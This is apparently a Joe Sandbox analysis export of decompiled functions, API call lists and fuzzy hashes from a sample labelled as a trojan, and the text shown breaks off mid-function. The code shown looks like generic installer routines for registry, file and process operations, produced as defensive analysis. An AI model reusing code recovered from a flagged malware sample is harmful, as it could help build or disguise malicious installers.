Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040259E Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				short* _t22;
				void* _t24;
				void* _t26;
				void* _t29;

				_t22 = __edi;
				_t21 = __edx;
				_t16 = __ebx;
				_t24 = E00402DE6(_t29, 0x20019);
				_t10 = E00402D84(3);
				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
				 *__edi = __ebx;
				if(_t24 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyW(_t24, _t10, __edi, 0x3ff);
					}
					_t22[0x3ff] = _t16;
					_push(_t24); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x0040259e
0x0040259e
0x0040259e
0x004025aa
0x004025ac
0x004025b4
0x004025b7
0x004025ba
0x0040292e
0x004025c0
0x004025c8
0x004025cb
0x004025e4
0x004025ea
0x004025ec
0x004025ee
0x004025ee
0x004025cd
0x004025d1
0x004025d1
0x004025f5
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 2ceb002e910c094db02aea1c2c62d66cc74a7b046aa56edd155f21af9fce9564
Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
Opcode Fuzzy Hash: 2ceb002e910c094db02aea1c2c62d66cc74a7b046aa56edd155f21af9fce9564
Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D

Uniqueness

Uniqueness Score: -1.00%

Function 0040252A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040252A(int* __ebx, char* __edi) {
				void* _t17;
				short* _t18;
				void* _t35;
				void* _t37;
				void* _t40;

				_t33 = __edi;
				_t27 = __ebx;
				_t17 = E00402DE6(_t40, 0x20019); // executed
				_t35 = _t17;
				_t18 = E00402DA6(0x33);
				 *__edi = __ebx;
				if(_t35 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x10) = 0x800;
					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
						L7:
						 *_t33 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x20) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
							E00406484(__edi,  *__edi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x20);
								_t33[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t35); // executed
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
				return 0;
			}

0x0040252a
0x0040252a
0x0040252f
0x00402536
0x00402538
0x0040253f
0x00402542
0x0040292e
0x00402548
0x0040254b
0x00402566
0x00402596
0x00402596
0x00402599
0x00402568
0x0040256c
0x00402585
0x0040258c
0x0040258f
0x0040256e
0x00402571
0x0040257c
0x004025f5
0x00000000
0x00000000
0x00000000
0x00402571
0x0040256c
0x004025fc
0x004025fd
0x004025fd
0x00402c2d
0x00402c39

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd7AB8.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: dd1b1b3d94faa584660aa564dd852358c6c0cbefcfc3417a0db06bb84b323ca4
Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
Opcode Fuzzy Hash: dd1b1b3d94faa584660aa564dd852358c6c0cbefcfc3417a0db06bb84b323ca4
Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x434f30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x433eec =  *0x433eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00402434 Relevance: 3.0, APIs: 2, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402434(void* __ebx) {
				long _t7;
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x20) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x2c));
				if( *(_t23 - 0x20) != __ebx) {
					_t7 = E00402E64(_t20, E00402DA6(0x22),  *(_t23 - 0x20) >> 1); // executed
					_t18 = _t7;
					goto L4;
				} else {
					_t10 = E00402DE6(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402DA6(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}

0x00402434
0x00402434
0x00402437
0x0040243a
0x00402476
0x0040247b
0x00000000
0x0040243c
0x0040243e
0x00402443
0x00402447
0x0040292e
0x0040292e
0x0040244d
0x0040245d
0x0040245f
0x0040247d
0x0040247f
0x00000000
0x00402485
0x0040247f
0x00402447
0x00402c2d
0x00402c39

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
RegCloseKey.ADVAPI32(00000000), ref: 0040245F

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
Opcode Fuzzy Hash: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D

Uniqueness

Uniqueness Score: -1.00%

Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EFC
EnableWindow.USER32(00000000,00000000), ref: 00401F07

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
Opcode Fuzzy Hash: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B20 Relevance: 3.0, APIs: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B20(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x430270->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405b29
0x00405b49
0x00405b51
0x00405b56
0x00000000
0x00405b5c
0x00405b60

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
CloseHandle.KERNEL32(?), ref: 00405B56

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x0040600d
0x00406013
0x00406018
0x00406021
0x00406021
0x0040602a

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000001.00000002.18481482091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.18481421058.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481572260.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481621853.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481825460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481848060.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481883817.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481943763.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.18481976578.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 6F3D2B98 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E6F3D2B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x6f3d5050 != 0 && E6F3D2ADB(_a4) == 0) {
					 *0x6f3d5054 = _t93;
					if( *0x6f3d504c != 0) {
						_t93 =  *0x6f3d504c;
					} else {
						E6F3D30C0(E6F3D2AD5(), __ecx);
						 *0x6f3d504c = _t93;
					}
				}
				_t28 = E6F3D2B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6F3D2AFD();
					_t72 = _a4;
					_t79 =  *0x6f3d5058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x6f3d5058 = _t72;
					E6F3D2AF7();
					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
					 *0x6f3d5034 = _t33;
					 *0x6f3d5038 = _t79;
